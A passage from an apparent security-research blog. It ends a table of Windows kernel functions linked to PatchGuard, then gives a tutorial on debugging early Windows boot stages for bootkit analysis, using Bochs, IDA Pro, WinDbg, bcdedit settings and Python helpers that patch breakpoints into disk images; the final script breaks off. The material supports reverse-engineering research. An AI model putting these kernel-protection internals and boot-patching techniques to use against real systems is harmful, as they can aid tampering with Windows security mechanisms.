<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopThermalZoneDpc</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PsQueryThreadTerminationPort</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PspGetReaperLink</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlLookupFunctionEntryEx</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpFlushLockedHives</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">SdbpCheckDll</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PspInitDeferredResourceReservation</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpDelayFreeTMWorker</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlPrivateResetHighestLockOffset </td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlReInitializeTunnelCache</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlRemovePerStreamContextEx</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiCheckForDivideOverflow</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiRundownScbQueue</td>
</tr>
<tr>
<td align="CENTER" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlInsertSmallIndex</td>
</tr>
</tbody>
</table>
<br />
These functions were taken from ntoskrnl.exe version 6.3.9600.17476 and are either used only by PatchGuard or are otherwise important for analysis. For example, IopTimerDispatch() is not dedicated to PatchGuard but can be used as one of its DPC routines, while KeInitAmd64SpecificState() and KeArmDiscoverCacheTopology() are dedicated functions used only to initiate PatchGuard.<br />
<br />
It seems that more functions have been added for PatchGuard since Windows 10, but most, if not all, of the functions listed here keep the same names. So although this list is unlikely to be complete, it should help you start your own analysis on both x64 and ARM.Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-19292694304061434712014-11-03T08:27:00.002-08:002014-11-03T08:35:23.375-08:00Debugging Early Boot Stages of Windows<div>
Recently, I spent some time reverse engineering a bootkit. It was a fun exercise, but I struggled to set up the environment beforehand because I could not find a page that explains these steps. So, as a note to myself, I wrote down how to build a bootkit debugging environment and how to configure Windows so that a debugger can be attached at some early, uncommon boot stages.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Boot Processes</h3>
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;">Here are the boot processes of BIOS-based Windows XP and Windows 7 systems. I will discuss each stage except for BIOS (POST) and Ntoskrnl.exe.</span><br />
<h4>
</h4>
<h4>
</h4>
<div>
<br /></div>
<h4>
Boot Process (XP)</h4>
<div>
BIOS (POST) -> MBR -> VBR -> Ntldr (Real-Mode) -> Ntldr (Protected-Mode) -> Ntoskrnl.exe</div>
<h4>
<br />Boot Process (Windows 7)</h4>
<div>
BIOS (POST) -> MBR -> VBR -> Bootmgr (Real-Mode) -> Bootmgr (Protected-Mode) -> Winload.exe -> Ntoskrnl.exe</div>
<div>
<br /></div>
<h3>
Debugging</h3>
<div>
<br /></div>
<h4>
MBR, VBR, Ntldr (Real-Mode) and Bootmgr (Real-Mode) </h4>
We need Bochs because no breakpoints are available during these stages. <br />
<br />
Installing an OS on Bochs is not hard unless you aim for a perfect configuration with smooth mouse movement, correct clock speed and working NICs. Since we are going to use this OS for nothing but boot debugging, I do not encourage you to spend time on that.<br />
<br />
The steps to install the OS are roughly as follows:<br />
<br />
<ol>
<li>Create a 10 GB flat hard disk image using bximage.exe.</li>
<li>Configure bochs.bxrc with bochs.exe to use the created hard disk image and an OS installer ISO image.</li>
<li>Start installing the OS.</li>
</ol>
<br />
Installation may take a few hours. I also strongly recommend using the latest version of Bochs to avoid unnecessary trouble. Even if your old IDA Pro does not work with the latest version, as was the case for me, you can switch to an older version of Bochs for debugging once the installation is complete. Here are my <a href="https://gist.github.com/tandasat/79f848dfcca4075285fd" target="_blank">bochsrc files</a> for versions 2.6.6 and 2.4.6, with nearly identical configurations. You may use them as samples if you are not familiar with Bochs.<br />
<br />
Once you have finished installing the OS (there is no need to apply Windows updates), you can debug the MBR and VBR either by running the image with bochsdbg.exe or by using Bochs together with IDA Pro. If you choose the former, you can add the following setting to enable a GUI debugger.<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br />display_library: win32, options="gui_debug"<br />----</span></blockquote>
<br />
Although the GUI debugger works perfectly fine, it is far better to use IDA Pro if you have it. Here is <a href="http://www.hexblog.com/?p=103" target="_blank">an article</a> about this process by Hex-Rays; in a nutshell, you can follow these steps:<br />
<br />
<ol>
<li><a href="http://hexblog.com/ida_pro/files/mbr_bochs.zip" target="_blank">Download the file</a> mentioned in the article.</li>
<li>Copy mbr.py to the directory that contains the hard disk image file.</li>
<li>Download and copy this <a href="https://gist.github.com/tandasat/87e615c8c291031dc09d" target="_blank">batch file</a> to the same directory (you will need to change paths in it).</li>
<li>Run the batch file. </li>
</ol>
<br />
You should see IDA Pro break at the very beginning of the MBR (0x7c00) unless there is a configuration error. From there, you can trace the code and should be able to debug the VBR as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgURsMpcGnhwlINOwcb_IF4JUGNdxcB6FzYe8_D3rz_RTBtUgs17Kdej3Kc_CqI6mEr-e6jBAHBuCqP1FH-Y4yUQv2JY0RIVPCEXk8GvAVF2iEpBEmRGb5q429i-kwHGaaWNgB3kQDrU5A/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgURsMpcGnhwlINOwcb_IF4JUGNdxcB6FzYe8_D3rz_RTBtUgs17Kdej3Kc_CqI6mEr-e6jBAHBuCqP1FH-Y4yUQv2JY0RIVPCEXk8GvAVF2iEpBEmRGb5q429i-kwHGaaWNgB3kQDrU5A/s1600/ida.png" height="414" width="640" /></a></div>
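If IDA Pro never breaks at 0x7c00, one thing worth ruling out is a disk image without a valid MBR. The following is a minimal sketch, not part of the original setup, that checks the 0x55 0xAA boot signature of a flat image and lists the partition entries so that you know where each VBR lives in the file. The function name and the image path are hypothetical, and 512-byte sectors are assumed.<br />

```python
import struct

SECTOR_SIZE = 512  # assumption: the flat image uses 512-byte sectors


def read_mbr_partitions(image_path):
    """Return the used primary partition entries of a flat disk image.

    Raises ValueError when sector 0 does not end with the 0x55 0xAA
    boot signature, which usually means the image is not bootable.
    """
    with open(image_path, "rb") as f:
        mbr = f.read(SECTOR_SIZE)
    if len(mbr) != SECTOR_SIZE or mbr[510:512] != b"\x55\xaa":
        raise ValueError("no valid MBR boot signature (0x55 0xAA) found")

    partitions = []
    for i in range(4):
        # The partition table starts at offset 446; each entry is 16 bytes.
        entry = mbr[446 + 16 * i:446 + 16 * (i + 1)]
        # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, start_lba, count = struct.unpack("<B3xB3xII", entry)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({
                "active": status == 0x80,
                "type": ptype,
                "start_lba": start_lba,
                "sectors": count,
                # File offset of the VBR inside the flat image.
                "vbr_offset": start_lba * SECTOR_SIZE,
            })
    return partitions


if __name__ == "__main__":
    # "c.img" is a placeholder for the image created with bximage.exe.
    for part in read_mbr_partitions("c.img"):
        print(part)
```

The vbr_offset value is the position in the image file where the VBR of that partition starts, which can help when comparing what the debugger shows with the bytes on disk.<br />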
<br />
<br />
<h4>
<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4f370715-005f-4945-9ce5-94cc91f48f0b" id="4254b8a5-f0c8-4d2e-b631-cb80ee442c85"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="e49413f9-afa2-4b4b-9ad3-3efdf11496c0" id="cfe6a8bb-3065-497f-9026-15bc44d646d0">Ntldr</span></span> (Real-Mode) and Bootmgr (Real-Mode)</h4>
<div>
Although it is entirely possible to trace the code until it reaches Ntldr or Bootmgr, doing so can be time consuming. One solution is to replace their entry point code with a breakpoint. Luckily, offset 0 of each of these files is its entry point, so we can simply overwrite offset 0 with a breakpoint. Here is the original entry point of Ntldr.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKapKchgTmrzxH2AjE4RjVfyBGXYDM5iqNvQFUbZqYKeHduyPlMybjoS7BfSFU65z4uSbWi9k7Gvl7D43IvsA82eDUkfBH2yetAOZlFTb1x35o72pFq_UJrCfVBfkj7FSz93Es7QtKcs/s1600/entryppp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKapKchgTmrzxH2AjE4RjVfyBGXYDM5iqNvQFUbZqYKeHduyPlMybjoS7BfSFU65z4uSbWi9k7Gvl7D43IvsA82eDUkfBH2yetAOZlFTb1x35o72pFq_UJrCfVBfkj7FSz93Es7QtKcs/s1600/entryppp.png" height="168" width="400" /></a></div>
<div>
<br /></div>
<div>
Also, since we are using a flat hard disk image file, we can search the image file for the code pattern of Ntldr or Bootmgr and patch it there. In my case, Ntldr was found at offset 0x133D55E00 in the image file.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_AqU2w-ynOHDcDTKzvmXV2dCEcxm13kyZAO4vAPpTW7A0h-M4znmdI-quvTAFYVru-MTyL82COPxfM1TOO7gxL6S5-f5WTYYn02-G8JbX8aLSV3i1M5zcRQIUU0g-zln-vgGG2nR52Q/s1600/patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_AqU2w-ynOHDcDTKzvmXV2dCEcxm13kyZAO4vAPpTW7A0h-M4znmdI-quvTAFYVru-MTyL82COPxfM1TOO7gxL6S5-f5WTYYn02-G8JbX8aLSV3i1M5zcRQIUU0g-zln-vgGG2nR52Q/s1600/patch.png" height="139" width="640" /></a></div>
<div>
<br /></div>
<div>
As shown in the image above, you will probably need to use the magic breakpoint provided by Bochs rather than a regular 0xCC, because the code runs in real mode rather than the usual protected mode. Bochs treats the instruction 'xchg bx, bx' (0x87 0xdb) as a breakpoint when the following statement is added to the bochsrc.</div>
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">magic_break: enabled=1</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span></blockquote>
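The search-and-patch step described above can also be scripted instead of done by hand in a hex editor. Here is a minimal sketch under a few assumptions: the image is a flat file, the pattern you pass in is the first few bytes of Ntldr or Bootmgr taken from a copy of the file, and that pattern occurs only once in the image. The function name and the file names are hypothetical.<br />

```python
import mmap

MAGIC_BREAK = b"\x87\xdb"  # xchg bx, bx: the Bochs magic breakpoint


def patch_magic_break(image_path, pattern):
    """Overwrite the first two bytes of `pattern` in the image with xchg bx, bx.

    Returns (offset, original_bytes) so the patch can be reverted later.
    Raises ValueError if the pattern is missing or matches more than once.
    """
    if len(pattern) < len(MAGIC_BREAK):
        raise ValueError("pattern must be at least two bytes long")
    with open(image_path, "r+b") as f, mmap.mmap(f.fileno(), 0) as image:
        offset = image.find(pattern)
        if offset < 0:
            raise ValueError("pattern not found in image")
        # Refuse to guess when several copies of the pattern exist.
        if image.find(pattern, offset + 1) >= 0:
            raise ValueError("pattern matches more than once; use a longer one")
        original = image[offset:offset + len(MAGIC_BREAK)]
        image[offset:offset + len(MAGIC_BREAK)] = MAGIC_BREAK
        image.flush()
    return offset, original


if __name__ == "__main__":
    # Placeholders: "ntldr" is a copy of the boot loader, "c.img" the flat image.
    with open("ntldr", "rb") as loader:
        entry_pattern = loader.read(32)
    where, saved = patch_magic_break("c.img", entry_pattern)
    print("patched at offset 0x%X, original bytes %s" % (where, saved.hex()))
```

Keep the returned original bytes: they tell you which instruction was replaced, and writing them back at the same offset restores the image.<br />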
Once you boot the virtual machine with Bochsdbg.exe, you should see the VM break at 0x2:0002.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs6YCJi-kGhg6D6dWCijSiGZY9mAefnEqqiQd0DjjhDAULVP_Y_YgW5OEcG3WG2XNO07sCbniycSOXFVdU0rlvSh4GauV-vXBjGfW-m-BfvKblhtTD_05ImFSedAIlQChiiL6lXjPqMq8/s1600/0x20002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs6YCJi-kGhg6D6dWCijSiGZY9mAefnEqqiQd0DjjhDAULVP_Y_YgW5OEcG3WG2XNO07sCbniycSOXFVdU0rlvSh4GauV-vXBjGfW-m-BfvKblhtTD_05ImFSedAIlQChiiL6lXjPqMq8/s1600/0x20002.png" height="414" width="640" /></a></div>
<br />
0x2:0000 is the actual breakpoint that we set. You can look at IDA to find where to go from here. In my case, execution needs to go to 0x01d8.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFe6TUAffJIg7a_lHuWvWUkE88COroM2f4KCb4FO1styvBKRmr3GzGjar_E5ZNFaE_pM0VME5omZmEd0QHXr3zkxNVZV0sKkbWak9NFGxVXPnyC9GpAVO2XhFuDCShnxVJeOFOozocaF0/s1600/dest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFe6TUAffJIg7a_lHuWvWUkE88COroM2f4KCb4FO1styvBKRmr3GzGjar_E5ZNFaE_pM0VME5omZmEd0QHXr3zkxNVZV0sKkbWak9NFGxVXPnyC9GpAVO2XhFuDCShnxVJeOFOozocaF0/s1600/dest.png" height="115" width="320" /></a></div>
<br />
Then you can change EIP with a 'set $eip = 0x01d8' command and step in with an 's' command to resume the regular code sequence.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDZq8I5Q89YTl3pNcVHdIPr1jKh-usykmZTwr_bO01CO0-prSXdQHVg19V-DnfdldKIjMoIEJJYFtu-_ernQmNYOGQb-6TwCk2oJUepAtdYsnLw3udJfc8Xqd7XILtvjrSuOSWuSkZLKQ/s1600/201d8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDZq8I5Q89YTl3pNcVHdIPr1jKh-usykmZTwr_bO01CO0-prSXdQHVg19V-DnfdldKIjMoIEJJYFtu-_ernQmNYOGQb-6TwCk2oJUepAtdYsnLw3udJfc8Xqd7XILtvjrSuOSWuSkZLKQ/s1600/201d8.png" height="414" width="640" /></a></div>
<br />
Note that my old IDA Pro (v6.0) did not stop when execution reached a magic breakpoint, but this issue may already have been fixed in the latest version of IDA.<br />
<br />
<h4>
</h4>
<h4>
<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="97f02cd4-dfe6-4d2c-a1f7-01242e48dcae" id="a790d666-6854-4fb0-99b1-572c36696674"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="f8caa334-b4c4-4195-85ce-6d05cc5ae8a4" id="6feb2948-d562-4281-abec-59da7ee7aedd"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="8bf2c4d5-9bf2-45e8-a5df-61166e9e75be" id="05d534c5-44a7-4658-a2c3-e881d9cf128f">Ntldr</span></span></span> (Protected-Mode)</h4>
<div>
The steps for debugging Ntldr (Protected-Mode) are relatively straightforward:</div>
<div>
<ol>
<li>Download and extract <a href="http://www.microsoft.com/en-us/download/details.aspx?id=1260" target="_blank">Ntldr of the checked build version</a>. </li>
<li>Open the extracted Ntldr with a hex editor and find the 'MZ' header in it. Copy everything from that header to the end of the file and save it on the <u>debugger</u> system. This article assumes that you saved it as E:\osloader.exe. This part contains the protected-mode code of Ntldr.</li>
<li>Overwrite the existing C:\ntldr with the extracted Ntldr (not osloader.exe).</li>
<li>Add the following [debug] section to boot.ini.</li>
</ol>
</div>
<blockquote class="tr_bq">
<span style="font-size: x-small;">---- </span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d66dd8f3-4920-4d78-b6f4-49934d7a6715" id="d1996254-bb4d-4919-887b-f6981dc0e0cd"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0f88900d-3462-414a-8557-b2f40c17cf11" id="61fc0d3e-ec9c-4fe0-b937-0f60d26430b2"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c4166ae8-7201-4ba6-a336-d5385e74dfb1" id="5d0bc79c-9167-4bdb-ba59-855e69cadbf3">boot</span></span></span> loader]</span><br />
<span style="font-size: x-small;">timeout=30</span><br />
<span style="font-size: x-small;">default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS</span><br />
<span style="font-size: x-small;"><br />
<span style="color: red;">[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="63abb64e-f01e-469d-8a11-c304c45a6ef0" id="41579fa8-23bd-40c3-a1ba-b0ecb02bf861"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0e3f4be8-92a2-47dc-99cb-f1a5bf604ca3" id="664cfac1-078a-441d-afdb-6d6887421fe3">debug</span></span>]<br />/<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6cc975e2-37ac-4e3f-8e1f-d58d547b7d2f" id="c711060c-bbd0-4130-93ab-30eb221f2c91"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="95203047-21f0-4996-a73e-75c16d07745d" id="d5d6689b-9828-4fff-b8c2-7bf996e2f2ce">debug</span></span> /debugport=COM1: /baudrate=115200 /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6cc975e2-37ac-4e3f-8e1f-d58d547b7d2f" id="77064a44-2dfa-4dd1-a931-6a5ba5aabca8"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="95203047-21f0-4996-a73e-75c16d07745d" id="c877e587-b081-4e22-b420-6b1381bc2c3c">debugstop</span></span></span></span><br />
<span style="font-size: x-small;"><br />
[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="2056b65b-7f92-4df8-b874-08bb95113aa0" id="50d68749-a2b0-497b-9dc3-0ca86675e023"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b153b62b-82be-4656-b370-31c6265a266a" id="fc332c50-06cf-43ba-9efb-bb1fd3cc4ca3">operating</span></span> systems]</span><br />
<span style="font-size: x-small;">multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="23a363ae-b133-452c-a57c-8b360171ce71" id="2ec4aa8e-a58b-4488-910b-416687392344"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6574ff15-8c85-4448-b297-fb8662d6b970" id="e7a810e0-bc5b-4d13-9287-531d5694c6dd">fastdetect</span></span></span><br />
<span style="font-size: x-small;">multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (Debug)" /noexecute=optin /fastdetect /debug /debugport=COM1: /baudrate=115200</span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">---- </span></blockquote>
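Step 2 above (carving the protected-mode image out of Ntldr) can be done with a short script instead of a hex editor. The sketch below assumes that the embedded image is a regular PE file, so it does not stop at the first 'MZ' bytes it sees; it also checks that the e_lfanew field at offset 0x3C of the candidate header points to a 'PE\0\0' signature. The function name and the input file name are hypothetical; the output path follows the one used in this article.<br />

```python
import struct


def carve_embedded_pe(ntldr_bytes):
    """Return everything from the first plausible embedded PE image onward.

    A candidate 'MZ' is accepted only if its e_lfanew field (offset 0x3C)
    points to a 'PE\\0\\0' signature, which filters out accidental matches.
    """
    pos = ntldr_bytes.find(b"MZ")
    while pos >= 0:
        lfanew_at = pos + 0x3C
        if lfanew_at + 4 <= len(ntldr_bytes):
            (e_lfanew,) = struct.unpack_from("<I", ntldr_bytes, lfanew_at)
            pe_at = pos + e_lfanew
            if ntldr_bytes[pe_at:pe_at + 4] == b"PE\x00\x00":
                return ntldr_bytes[pos:]
        pos = ntldr_bytes.find(b"MZ", pos + 1)
    raise ValueError("no embedded PE image found")


if __name__ == "__main__":
    # "ntldr" is a placeholder for the extracted checked-build Ntldr.
    with open("ntldr", "rb") as src:
        image = carve_embedded_pe(src.read())
    with open(r"E:\osloader.exe", "wb") as dst:
        dst.write(image)
    print("wrote %d bytes" % len(image))
```

The result should match what you get by copying from the 'MZ' header to the end of the file by hand.<br />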
Once you reboot the debuggee XP system, it waits for a kernel debugger to connect. To load symbols and suppress error messages, you can manually read in the osloader.exe image as follows.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="43c08a24-be71-4995-a67b-b3584e236167" id="030fc213-5b5b-4e65-840c-f76ebe72cf90"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b18969a5-81e9-4ff9-affa-59b0cb1374f0" id="b602a48a-5027-463d-bc2d-030960db249d">kd</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="43c08a24-be71-4995-a67b-b3584e236167" id="e214ef0c-b172-41d8-ad47-5b56accde29e"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b18969a5-81e9-4ff9-affa-59b0cb1374f0" id="7283b4f9-02bc-44d1-a8f4-adbc2b5be6c0">> .</span></span>readmem E:\osloader.exe 0x400000 L0x1000<br />Reading 1000 bytes..<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="dc005b93-b7cc-47a0-b172-10d8183cabf2"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="cf5730d4-84aa-4a4a-bdb2-65e049ec5894">kd</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="59382282-0e72-4314-bbec-f6216bdb5477"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="b13c6c44-d6a1-422e-8548-fa014c8f4916">> .</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="269aa37e-2998-4f71-9f63-6ab23c944f52"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="43d8b3f3-ddc1-4a12-997f-86faed5aebf8">imgscan</span></span> /l /r 00400000<br />MZ at 00400000 - size 80000<br /> Name: osloader.EXE<br /> Loaded osloader.EXE module<br />----</span></blockquote>
Now you are free to observe how Ntoskrnl.exe and the boot drivers are initialized.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc1d_JBw5FyXQ78EoyPaYiArc4S2X_ME15tX8X0_dTLQ7z_xRE-rydb_xfRHySk_okizyCwYv-1LIQch6o5EbHxaS1fLKTeRCrRhYYGYnH94_dtfKWWZOV1RlphJMZDhK8YUqMfllqFf8/s1600/Screen+Shot+2014-11-02+at+2.53.50+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc1d_JBw5FyXQ78EoyPaYiArc4S2X_ME15tX8X0_dTLQ7z_xRE-rydb_xfRHySk_okizyCwYv-1LIQch6o5EbHxaS1fLKTeRCrRhYYGYnH94_dtfKWWZOV1RlphJMZDhK8YUqMfllqFf8/s1600/Screen+Shot+2014-11-02+at+2.53.50+PM.png" height="459" width="640" /></a></div>
<br />
<h4>
Bootmgr (Protected-Mode)</h4>
Bootmgr is the boot manager. It is responsible for displaying the boot menu and launching the appropriate program according to the user's selection.<br />
<br />
Unlike with Ntldr, you can enable the boot manager debugger simply with the following command.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br />bcdedit /bootdebug {bootmgr} on<br />----</span></blockquote>
<div>
For more details, consult the MSDN page <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff542183(v=vs.85).aspx" target="_blank">BCDEdit /bootdebug</a>. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS9Q3W-i11zXrpLYqZOCmhS0a2XTd66w-QjdDXExfB2qvixeF3yZx7xSsx3snYHkQ_mYXYTYpJwdN85rcqpGNZuVL7qDFx2wbzNGH6Hjn5_wbCHV3_lixM6Pt6IvYfVaMmEhdP0OMctdA/s1600/Screen+Shot+2014-11-02+at+5.05.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS9Q3W-i11zXrpLYqZOCmhS0a2XTd66w-QjdDXExfB2qvixeF3yZx7xSsx3snYHkQ_mYXYTYpJwdN85rcqpGNZuVL7qDFx2wbzNGH6Hjn5_wbCHV3_lixM6Pt6IvYfVaMmEhdP0OMctdA/s1600/Screen+Shot+2014-11-02+at+5.05.11+PM.png" height="454" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Note that the executable file is located at C:\Windows\Boot\PCAT\bootmgr and, as with Ntldr, contains a 32-bit PE image.</div>
<h4>
<br />Winload.exe</h4>
Winload.exe is the boot loader used for the regular boot procedure. It loads Ntoskrnl.exe and the boot drivers. As with Bootmgr, the boot loader debugger can be enabled simply with bcdedit.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br />bcdedit /bootdebug on<br />----</span></blockquote>
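If you switch these settings on and off often, the two bcdedit invocations from this post can be wrapped in a small script. The following is a minimal Python sketch under the assumption that it runs from an elevated prompt on the debuggee; the helper names are hypothetical, and it defaults to a dry run that only prints the commands.<br />

```python
import subprocess


def bootdebug_command(target=None, enable=True):
    """Build the argument list for `bcdedit /bootdebug [target] on|off`."""
    args = ["bcdedit", "/bootdebug"]
    if target is not None:
        # For example "{bootmgr}" to address the boot manager entry.
        args.append(target)
    args.append("on" if enable else "off")
    return args


def apply(commands, dry_run=True):
    """Print each command and, unless dry_run is set, execute it."""
    for args in commands:
        print(" ".join(args))
        if not dry_run:
            # Raises CalledProcessError if bcdedit reports a failure.
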